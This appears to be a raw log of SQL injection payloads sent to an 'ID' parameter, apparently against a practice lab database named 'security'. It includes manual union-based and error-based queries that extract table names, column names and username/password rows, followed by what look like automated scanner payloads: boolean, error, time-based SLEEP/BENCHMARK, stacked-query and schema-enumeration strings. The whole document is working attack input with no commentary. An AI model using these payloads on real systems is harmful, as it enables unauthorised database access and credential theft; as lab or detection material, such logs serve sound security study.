ID:1
ID:1
ID:1'
ID:1' and '1'='1
ID:1' and '1'='2
ID:1' order by 1-- 
ID:1' order by 2-- 
ID:1' order by 3-- 
ID:1' order by 4-- 
ID:1' and 1=2 union select 1,2,3-- 
ID:1' and 1=2 union select 1,2,database()-- 
ID:1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- 
ID:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.tables where table_schema='security' and table_name='users'-- 
ID:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- 
ID:1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1-- 
ID:1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1-- 
ID:1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1-- 
ID:1
ID:1' -- 
ID:1' -- 
ID:1' and extractvalue(1,concat('~',database()))-- 
ID:-1' and extractvalue(1,concat('~',database()))-- 
ID:-1' and extractvalue(1,concat('~',database()))-- 
ID:1' and extractvalue(1,concat('~',database()))-- 
ID:1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))-- 
ID:1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))-- 
ID:1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 0,1)))-- 
ID:1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 0,1)))-- 
ID:1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 1,1)))-- 
ID:1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 2,1)))-- 
ID:1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
ID:1
ID:1
ID:1
ID:4661
ID:1()(,"'(())
ID:1'MZmWkg<'">kHDgPp
ID:1
ID:1)/**/AND/**/3211=7886/**/AND/**/(2438=2438
ID:1)/**/AND/**/7400=7400/**/AND/**/(3787=3787
ID:1/**/AND/**/8021=3437
ID:1/**/AND/**/7400=7400
ID:1/**/AND/**/5992=1570--/**/hHFz
ID:1/**/AND/**/7400=7400--/**/IDDC
ID:1')/**/AND/**/6133=2348/**/AND/**/('YErX'='YErX
ID:1')/**/AND/**/7400=7400/**/AND/**/('VVWy'='VVWy
ID:1'/**/AND/**/8435=1192/**/AND/**/'JReH'='JReH
ID:1'/**/AND/**/7400=7400/**/AND/**/'ZLzu'='ZLzu
ID:1'/**/AND/**/3757=8187/**/AND/**/'Kjlj'='Kjlj
ID:(SELECT/**/CONCAT(CONCAT(0x716b717a71,(CASE/**/WHEN/**/(7953=7953)/**/THEN/**/0x31/**/ELSE/**/0x30/**/END)),0x7162787871))
ID:1'/**/AND/**/(SELECT/**/2*(IF((SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(7961=7961,1))),0x7162787871,0x78))s),/**/8446744073709551610,/**/8446744073709551610)))/**/AND/**/'IWvb'='IWvb
ID:1'/**/OR/**/(SELECT/**/2*(IF((SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(3756=3756,1))),0x7162787871,0x78))s),/**/8446744073709551610,/**/8446744073709551610)))/**/AND/**/'Iofp'='Iofp
ID:1'/**/AND/**/EXP(~(SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(6503=6503,1))),0x7162787871,0x78))x))/**/AND/**/'OkPi'='OkPi
ID:1'/**/OR/**/EXP(~(SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(5933=5933,1))),0x7162787871,0x78))x))/**/AND/**/'oktx'='oktx
ID:1'/**/AND/**/GTID_SUBSET(CONCAT(0x716b717a71,(SELECT/**/(ELT(3223=3223,1))),0x7162787871),3223)/**/AND/**/'fBmf'='fBmf
ID:1'/**/OR/**/GTID_SUBSET(CONCAT(0x716b717a71,(SELECT/**/(ELT(9775=9775,1))),0x7162787871),9775)/**/AND/**/'zQaa'='zQaa
ID:1'/**/AND/**/JSON_KEYS((SELECT/**/CONVERT((SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(8854=8854,1))),0x7162787871))/**/USING/**/utf8)))/**/AND/**/'uVRf'='uVRf
ID:1'/**/OR/**/JSON_KEYS((SELECT/**/CONVERT((SELECT/**/CONCAT(0x716b717a71,(SELECT/**/(ELT(5141=5141,1))),0x7162787871))/**/USING/**/utf8)))/**/AND/**/'lBeF'='lBeF
ID:1'/**/AND/**/(SELECT/**/3869/**/FROM(SELECT/**/COUNT(*),CONCAT(0x716b717a71,(SELECT/**/(ELT(3869=3869,1))),0x7162787871,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.PLUGINS/**/GROUP/**/BY/**/x)a)/**/AND/**/'CgXk'='CgXk
ID:(SELECT/**/CONCAT(0x716b717a71,(ELT(1209=1209,1)),0x7162787871))
ID:>=/**/5.0
ID:1
ID:1
ID:1
ID:1';SELECT/**/SLEEP(5)#
ID:1';SELECT/**/SLEEP(5)/**/AND/**/'IwoK'='IwoK
ID:1';(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5)))AsTT)#
ID:1';(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5)))KZcc)/**/AND/**/'DPwS'='DPwS
ID:1';SELECT/**/BENCHMARK(5000000,MD5(0x66494770))#
ID:1';SELECT/**/BENCHMARK(5000000,MD5(0x714f6f44))/**/AND/**/'uxGc'='uxGc
ID:1'/**/AND/**/(SELECT/**/9724/**/FROM/**/(SELECT(SLEEP(5)))VZkx)/**/AND/**/'lyrA'='lyrA
ID:1'/**/AND/**/(SELECT/**/9724/**/FROM/**/(SELECT(SLEEP(0)))VZkx)/**/AND/**/'lyrA'='lyrA
ID:1'/**/AND/**/(SELECT/**/9724/**/FROM/**/(SELECT(SLEEP(5)))VZkx)/**/AND/**/'lyrA'='lyrA
ID:>=/**/5.0.12
ID:1'/**/ORDER/**/BY/**/1--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/ORDER/**/BY/**/1#
ID:1'/**/ORDER/**/BY/**/6236#
ID:1'/**/ORDER/**/BY/**/10#
ID:1'/**/ORDER/**/BY/**/6#
ID:1'/**/ORDER/**/BY/**/4#
ID:1'/**/ORDER/**/BY/**/3#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b717a71,0x544a5a774f4e71796b6e53415a625061486f646e6f4576724c716a414c67485869436964714d4479,0x7162787871)#
ID:1'/**/UNION/**/ALL/**/SELECT/**/CONCAT(0x716b717a71,0x4466546656794177486f67444742696e526954747969595748746f6e4e704344794e5641564a486d,0x7162787871),NULL,NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,0x667071585556556f6f77484e546548677574725352555a76557874766b666b5a4c7a436267624665,0x7162787871),NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b717a71,0x517a756d6671487a4848,0x7162787871)#
ID:1'/**/UNION/**/ALL/**/SELECT/**/CONCAT(0x716b717a71,0x4b7369464b7578557978,0x7162787871),NULL,NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,0x544967754469437a4a65,0x7162787871),NULL#
ID:-5815'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,0x624d6c4e47436d736c647271715a6d62656d56585650715361434371597370455065526164486a65,0x7162787871),NULL#
ID:-8521'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,(CASE/**/WHEN/**/(9782=/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/9782)/**/THEN/**/1/**/ELSE/**/0/**/END),0x7162787871),NULL#
ID:-8351'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,(CASE/**/WHEN/**/(VERSION()/**/LIKE/**/0x254d61726961444225)/**/THEN/**/1/**/ELSE/**/0/**/END),0x7162787871),NULL#
ID:1
ID:>=/**/5.0.12
ID:-3769'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,JSON_ARRAYAGG(CONCAT_WS(0x6274656a6d6f,schema_name)),0x7162787871),NULL/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA#
ID:-8476'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b717a71,IFNULL(CAST(COUNT(schema_name)/**/AS/**/NCHAR),0x20),0x7162787871),NULL/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA#
ID:-1791'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/0,1),NULL#
ID:-4404'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/1,1),NULL#
ID:-1354'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/2,1),NULL#
ID:-3875'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/3,1),NULL#
ID:-5142'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/4,1),NULL#
ID:-6690'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/5,1),NULL#
ID:-2188'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/6,1),NULL#
ID:-1641'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/7,1),NULL#
ID:-2349'/**/UNION/**/ALL/**/SELECT/**/NULL,(SELECT/**/CONCAT(0x716b717a71,IFNULL(CAST(schema_name/**/AS/**/NCHAR),0x20),0x7162787871)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA/**/LIMIT/**/8,1),NULL#
ID:1
ID:1
ID:1
ID:7206
ID:1)(((,'",,,
ID:1'ROviiX<'">cknsSY
ID:1
ID:1
ID:2876
ID:1.'(())..,"
ID:1'SGvZcc<'">sForoW
ID:1
ID:1)/**/AND/**/2733=9475/**/AND/**/(5944=5944
ID:1)/**/AND/**/6668=6668/**/AND/**/(3112=3112
ID:1/**/AND/**/5951=3807
ID:1/**/AND/**/6668=6668
ID:1/**/AND/**/1846=2125--/**/SAuc
ID:1/**/AND/**/6668=6668--/**/qWcg
ID:1')/**/AND/**/2787=2041/**/AND/**/('ZDyG'='ZDyG
ID:1')/**/AND/**/6668=6668/**/AND/**/('rCuT'='rCuT
ID:1'/**/AND/**/3332=8462/**/AND/**/'Tsny'='Tsny
ID:1'/**/AND/**/6668=6668/**/AND/**/'hEEc'='hEEc
ID:1'/**/AND/**/9603=5034/**/AND/**/'HgAW'='HgAW
ID:(SELECT/**/CONCAT(CONCAT(0x716b706a71,(CASE/**/WHEN/**/(2383=2383)/**/THEN/**/0x31/**/ELSE/**/0x30/**/END)),0x7171786a71))
ID:1'/**/AND/**/(SELECT/**/2*(IF((SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(2555=2555,1))),0x7171786a71,0x78))s),/**/8446744073709551610,/**/8446744073709551610)))/**/AND/**/'BbSa'='BbSa
ID:1'/**/OR/**/(SELECT/**/2*(IF((SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(2334=2334,1))),0x7171786a71,0x78))s),/**/8446744073709551610,/**/8446744073709551610)))/**/AND/**/'YGNP'='YGNP
ID:1'/**/AND/**/EXP(~(SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(8945=8945,1))),0x7171786a71,0x78))x))/**/AND/**/'jDRi'='jDRi
ID:1'/**/OR/**/EXP(~(SELECT/**/*/**/FROM/**/(SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(3120=3120,1))),0x7171786a71,0x78))x))/**/AND/**/'ybot'='ybot
ID:1'/**/AND/**/GTID_SUBSET(CONCAT(0x716b706a71,(SELECT/**/(ELT(9812=9812,1))),0x7171786a71),9812)/**/AND/**/'OYmX'='OYmX
ID:1'/**/OR/**/GTID_SUBSET(CONCAT(0x716b706a71,(SELECT/**/(ELT(2712=2712,1))),0x7171786a71),2712)/**/AND/**/'AmGl'='AmGl
ID:1'/**/AND/**/JSON_KEYS((SELECT/**/CONVERT((SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(1585=1585,1))),0x7171786a71))/**/USING/**/utf8)))/**/AND/**/'XQjp'='XQjp
ID:1'/**/OR/**/JSON_KEYS((SELECT/**/CONVERT((SELECT/**/CONCAT(0x716b706a71,(SELECT/**/(ELT(2838=2838,1))),0x7171786a71))/**/USING/**/utf8)))/**/AND/**/'iUcG'='iUcG
ID:1'/**/AND/**/(SELECT/**/4915/**/FROM(SELECT/**/COUNT(*),CONCAT(0x716b706a71,(SELECT/**/(ELT(4915=4915,1))),0x7171786a71,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.PLUGINS/**/GROUP/**/BY/**/x)a)/**/AND/**/'vmvX'='vmvX
ID:(SELECT/**/CONCAT(0x716b706a71,(ELT(8310=8310,1)),0x7171786a71))
ID:>=/**/5.0
ID:1
ID:1
ID:1
ID:1';SELECT/**/SLEEP(5)#
ID:1';SELECT/**/SLEEP(5)/**/AND/**/'XJrq'='XJrq
ID:1';(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5)))cPAD)#
ID:1';(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5)))MMcQ)/**/AND/**/'kCOP'='kCOP
ID:1';SELECT/**/BENCHMARK(5000000,MD5(0x6d5a4168))#
ID:1';SELECT/**/BENCHMARK(5000000,MD5(0x504f665a))/**/AND/**/'sVWG'='sVWG
ID:1'/**/AND/**/(SELECT/**/5064/**/FROM/**/(SELECT(SLEEP(5)))HaAV)/**/AND/**/'suMn'='suMn
ID:1'/**/AND/**/(SELECT/**/5064/**/FROM/**/(SELECT(SLEEP(0)))HaAV)/**/AND/**/'suMn'='suMn
ID:1'/**/AND/**/(SELECT/**/5064/**/FROM/**/(SELECT(SLEEP(5)))HaAV)/**/AND/**/'suMn'='suMn
ID:>=/**/5.0.12
ID:1'/**/ORDER/**/BY/**/1--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--/**/-
ID:1'/**/ORDER/**/BY/**/1#
ID:1'/**/ORDER/**/BY/**/3387#
ID:1'/**/ORDER/**/BY/**/10#
ID:1'/**/ORDER/**/BY/**/6#
ID:1'/**/ORDER/**/BY/**/4#
ID:1'/**/ORDER/**/BY/**/3#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b706a71,0x695354444b73626275506e617a4d79544a645053424e6949665a54675567704c525a636849674864,0x7171786a71)#
ID:1'/**/UNION/**/ALL/**/SELECT/**/CONCAT(0x716b706a71,0x6a64506e474d676a56757671547377466164445772764d4752647a74426a74735668595468526d72,0x7171786a71),NULL,NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b706a71,0x65417248746564755943745045584e4e56754d636d4772566e4b79677646516d6c53446f62546265,0x7171786a71),NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b706a71,0x79706c79534d53754877,0x7171786a71)#
ID:1'/**/UNION/**/ALL/**/SELECT/**/CONCAT(0x716b706a71,0x6b6d536547726248496f,0x7171786a71),NULL,NULL#
ID:1'/**/UNION/**/ALL/**/SELECT/**/NULL,CONCAT(0x716b706a71,0x6b515962517577784e46,0x7171786a71),NULL#
ID:-9884'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b706a71,0x68714f6e427a6a7a64637250456852676e497144656c786a4b75717166447453444e4e6d474a4f48,0x7171786a71)#
ID:-4912'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x716b706a71,(CASE/**/WHEN/**/(3367=/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/3367)/**/THEN/**/1/**/ELSE/**/0/**/END),0x7171786a71)#
ID:1
ID:999999.9
ID:1 and 1=1
ID:1 and 1>1
ID:1' and 'x'='x
ID:1' and 'x'='y
ID:1' and 'x'='x
ID:1'
ID:1' and 1=/*!30000 1*/ and 'x'='x
ID:1' and 1=/*!40100 1*/ and 'x'='x
ID:1' and 1=/*!50000 1*/ and 'x'='x
ID:999999.9' union all select 0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,0x31303235343830303536 and 'x'='x
ID:999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x
